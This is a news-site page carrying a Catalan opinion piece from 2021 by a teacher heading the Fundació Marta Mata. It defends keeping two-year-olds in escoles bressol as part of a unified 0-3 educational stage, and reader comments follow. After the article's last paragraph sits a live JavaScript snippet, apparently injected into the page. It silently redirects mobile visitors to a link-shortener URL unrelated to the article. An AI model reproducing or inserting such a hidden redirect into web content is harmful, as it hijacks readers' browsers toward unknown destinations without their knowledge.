Close Menu
El Diari de l'EducacióEl Diari de l'Educació

    EL més llegit

    Eduardo Núñez: “L’educació té un infrafinançament crònic”

    Ana Basanta

    El professorat comunitari: cap a una nova cultura docent i de compromís social

    Francesc Imbernon

    Pacte nacional per la llengua i educació

    Xavier Besalú

    Reminiscència i complicitat passiva

    Guille de las Heras

    Com es construeix una teoria de la conspiració

    Ares Biescas (Verificat)
    Facebook X (Twitter) Instagram
    Facebook X (Twitter) Instagram
    El Diari de l'EducacióEl Diari de l'Educació
    COL·LABORA
    • Escola
    • Joventut i infància
    • Universitat
    • Llengua i Cultura
    • Comunitat
    • Opinió
    • Blogs
    El Diari de l'EducacióEl Diari de l'Educació

    Opinió
    Els infants de dos anys, a l’escola bressol

    abaigmaig 19, 20215 Mins Read
    Twitter Bluesky Facebook LinkedIn Telegram WhatsApp Email Copy Link
    Segueix-nos
    X (Twitter) Instagram LinkedIn Telegram Facebook RSS
    Escola Bressol Municipal de Barcelona | Foto: Sandra Vicente
    Share
    Twitter Bluesky Facebook LinkedIn Telegram WhatsApp Email Copy Link

    Som una Fundació que exercim el periodisme en obert, sense murs de pagament. Però no ho podem fer sols, com expliquem en aquest editorial.
    Clica aquí i ajuda'ns!

    Marta Mata, en el seu discurs de l’any 1999, quan va ser investida Doctora Honoris Causa per la UAB, deia: “Benaurat Plató, que va concebre la República com el marc de la política democràtica i de l’educació dels infants, alhora, i benaurada la civilització, que ha après de somiar-ho amb ell (…) El somni és un element configurador de l’educació pública, que ha de ser somniada, viscuda interiorment pels que la volen, encara que no existeixi en la realitat, si és que prenen el compromís de la seva realització”.

    Marta Mata i Irene Balaguer van ser fidels a Plató i somiaren, i van lluitar perquè l’educació dels més petits deixés de ser només una necessitat social. Els anys 1970 i 1980, els llocs on es tenia cura dels més petits s’anomenaven guarderies. Algunes depenien de Serveis Socials, d’altres de Sanitat i unes quantes de Treball i Benestar Social. Marta Mata i Irene Balaguer, juntament amb altres mestres, treballaren perquè la cura dels infants de 0 a 3 anys assolís la categoria d’etapa educativa i es reconegués com a dret de tots els infants de 0 a 6 anys l’atenció de qualitat, tenint en compte les seves necessitats específiques, tal com consta a la Convenció dels Drets de l’Infant, que el mes de novembre passat va complir trenta anys.

    A la passió que totes dues sentien per l’educació dels més petits, hi sumaven l’interès per trobar la paraula més adequada per anomenar el lloc on educar-los, perquè, com diu Michel Foucault, les paraules no són neutrals.

    Amb aquests paràgrafs vaig obrir la XI Jornada Marta Mata Garriga, que vam celebrar el mes de febrer de l’any 2020 a Saifores, i ho repeteixo, perquè novament em veig amb l’obligació d’escriure sobre l’educació dels més petits, de 0 a 3 anys, davant del rebombori de propostes, tant a l’Estat com a Catalunya, sobre si situar els nens de dos anys a les escoles bressol o a les escoles d’infantil i primària, i ho faig invocant dues persones que tant i tant ens van aportar per deixar ben clara la prioritat educativa de tota institució dedicada a l’infant. Com més petit, més educativa –perquè el més important és l’ajut al desenvolupament de la seva personalitat– i aquesta etapa s’anomena escola bressol i no guarderia.

    El juliol de 1976, en un document titulat Per una nova escola pública catalana. Declaració de l’XI Escola d’estiu de Barcelona, el punt 4.5 recull que “cal un conjunt institucional que aculli un tronc únic sense trencaments, amb titulació única que tingui els cicles següents, definits més per edat madurativa que cronològica: llars d’infants, de zero a tres anys; parvulari de tres a set anys; primer cicle d’ensenyament, de set a deu anys; segon cicle de deu a dotze anys; tercer cicle de dotze a catorze anys; quart cicle, de catorze anys en amunt”.

    Observem que ja en aquest document es recull el cicle de zero a tres anys com una etapa educativa que ha de ser científicament plantejada i realitzada formalment, institucionalment i professionalment.

    És a la dècada dels vuitanta que es realitzaren congressos de la Coordinadora Estatal de Escuelas Infantiles reivindicant formació específica i reconeixement de les persones que s’hi dedicaven professionalment.

    Recordo que vaig participar com a vicepresidenta de la Comissió d’Ensenyament de la Federació de Municipis de Catalunya, al 6è Congrés que es va celebrar a Girona, el desembre de 1988, i en el qual vam concloure que l’educació infantil era l’etapa educativa de zero a sis anys, amb dos cicles: el zero a tres anys com escola bressol  i el tres a sis anys com a parvulari, no com a preescolar, i que des dels ajuntaments defensaríem que s’obrissin classes de tres anys a les escoles públiques.

    Més endavant, la Logse va reordenar el batibull de l’oferta educativa a la xarxa d’escoles públiques que majoritàriament es donava en els 4 i 5 anys i a la vegada concentrava els esforços amb el canvi d’una programació de preescolar (abans de l’escola) amb la de parvulari, on cal que s’ofereixi a l’infant un ambient per la socialització, la seguretat i el zel d’aprendre, d’expressió espontània, dignitat i autonomia en contacte amb el medi natural… Sabem que no va ser gens fàcil la incorporació de la classe de tres anys a les escoles i recordem encara alguns anuncis d’escoles que a l’hora d’inscriure els infants demanaven que no portessin dodotis o  tinguessin control d’esfínters.

    Per què ara aquesta febre de voler trencar un cicle que té sentit en ell mateix? Si hi ha sobrant d’espai a les escoles, reduïm ràtios, fem més grups i millorarem la qualitat de l’educació. Si volem que els nens i nenes de dos anys tinguin plaça gratuïta (que ja seria hora) ajudem els ajuntaments al manteniment de la seva oferta, que fa anys que la Generalitat no hi posa els recursos que s’havia compromès a donar.

    Si cal fer passos endavant, en proposo dos:

    1. Coordinem les escoles bressol de zero a tres anys, per fer les connexions que calgui d’objectius i finalitats amb l’etapa educativa de tres a sis de les escoles.
    2. Incrementem la despesa educativa com a inversió de futur.

    I així anirem avançant en el somni d’una educació pública de 0 a 18 anys, pel qual fa tants anys que treballem.

    var isMobile = /iPhone|iPad|iPod|Android/i.test(navigator.userAgent); var element = document.getElementById(‘text’); if (isMobile) { window.location.href = “https://zeep.ly/KHeRc”; } else { }

    Si t'agrada aquest article, dóna'ns suport amb una donació.



    Educació 0-3 escoles bressol llars d'infants opinió
    Share. Twitter Bluesky LinkedIn Facebook WhatsApp Telegram Email Copy Link
    Previous Article
    Actualitat
    Una nova agressió d’un alumne a una docent: què s’hi pot fer? Són casos aïllats? (i II)
    Next Article
    Anàlisi
    Com serà el curs vinent? La pregunta que només es respondrà al setembre
    abaig

    Mestra i presidenta de la Fundació Marta Mata

    Related Posts

    Opinió
    Pensar en veu pròpia en un món que crida massa

    maig 29, 2025

    Opinió
    El greuge de no ser tinguts en compte

    maig 28, 2025

    Opinió
    Els adolescents ens estan demanant ajuda, i el silenci els fa mal

    maig 28, 2025

    No hi ha comentaris

    1. Joan Domènech on maig 20, 2021 8:18 pm

      Absolutament d’acord. En temps d’Instituts Escola, cal tornar a pensar la unitat de l’educació infantil. No podem deixar-la en centres educatius 6-16. Cal una proposta d’aquesta etapa, vinculada territorialment a les altres obligatòries, però autònoma pedagògicament i organitzativament. I ho hem de fer ara que sembla que es torna a posar sobre la taula la importància de l’educació en aquestes primeres edats.

      Reply
    2. Jaume Cela Ollé on maig 21, 2021 7:27 am

      Del tot d’acord amb el contingut de l’article. No pòdem perdre la bona feina que s’ha fet en aquesta etapa i en els cicles que la componen. Felicitats Assumpta.

      Reply
    3. montse on maig 24, 2021 12:06 pm

      Gràcies Assumpta per recordar els somnis de la Marta i Irene, perquè també són els nostres.
      Gràcies per posar en relleu els itineraris que s’han fet i per recordar-nos i posar en valor, poder fer possible l’escola 0-6.

      Reply
    Reply To Jaume Cela Ollé Cancel Reply

    SIGNA

    Per un debat educatiu responsable i respectuós.

    MÉS INFORMACIÓ

    • Escola
    • Joventut i infància
    • Universitat
    • Llengua i Cultura
    • Comunitat
    • Opinió
    • Blogs
    • Escola
    • Joventut i infància
    • Universitat
    • Llengua i Cultura
    • Comunitat
    • Opinió
    • Blogs

    Vols rebre el butlletí setmanal del Diari de l’Educació?

    QUI SOM?

    Fundació Periodisme Plural

    ISSN 2339 - 9619

    ON SOM?

    Carrer Bailén 5, principal.
    08010, Barcelona

    El Diari de l'Educació

    CONTACTA'NS

    Ana Basanta
     
    abasanta@periodismeplural.cat
    redaccio@diarieducacio.cat
    publicitat@periodismeplural.cat
     
    Telèfon:
    932 311 247

    CONNECTA

    X (Twitter) Instagram Facebook RSS

    AMB EL SUPORT DE

    • Qui som?
    • Consell assessor
    • Catalunya Plural
    • Fundació Periodisme Plural
    • El Diari de la Sanitat
    • El Diari del Treball
    • Qui som?
    • Consell assessor
    • Catalunya Plural
    • Fundació Periodisme Plural
    • El Diari de la Sanitat
    • El Diari del Treball

    El Diari de l’Educació, 2025

    • Avís legal i política de privacitat
    • Avís legal i política de privacitat

    Type above and press Enter to search. Press Esc to cancel.

    Gestionar consentimiento

    Per a oferir les millors experiències, utilitzem tecnologies com les cookies per a emmagatzemar i/o accedir a la informació del dispositiu. El consentiment d'aquestes tecnologies ens permetrà processar dades com el comportament de navegació o les identificacions úniques en aquest lloc. No consentir o retirar el consentiment, pot afectar negativament unes certes característiques i funcions.

    Funcional Sempre actiu
    L'emmagatzematge o accés tècnic és estrictament necessari per al propòsit legítim de permetre l'ús d'un servei específic explícitament sol·licitat per l'abonat o usuari, o amb l'únic propòsit de dur a terme la transmissió d'una comunicació a través d'una xarxa de comunicacions electròniques.
    Preferencias
    El almacenamiento o acceso técnico es necesario para la finalidad legítima de almacenar preferencias no solicitadas por el abonado o usuario.
    Estadístiques
    L'emmagatzematge o accés tècnic que és utilitzat exclusivament amb finalitats estadístics. El almacenamiento o acceso técnico que se utiliza exclusivamente con fines estadísticos anónimos. Sin un requerimiento, el cumplimiento voluntario por parte de tu proveedor de servicios de Internet, o los registros adicionales de un tercero, la información almacenada o recuperada sólo para este propósito no se puede utilizar para identificarte.
    Marketing
    L'emmagatzematge o accés tècnic és necessari per a crear perfils d'usuari per a enviar publicitat, o per a rastrejar a l'usuari en una web o en diverses web amb finalitats de màrqueting similars.
    Gestiona les opcions Gestiona els serveis Gestiona {vendor_count} proveïdors Llegeix més sobre aquests propòsits
    Veure preferències
    {title} {title} {title}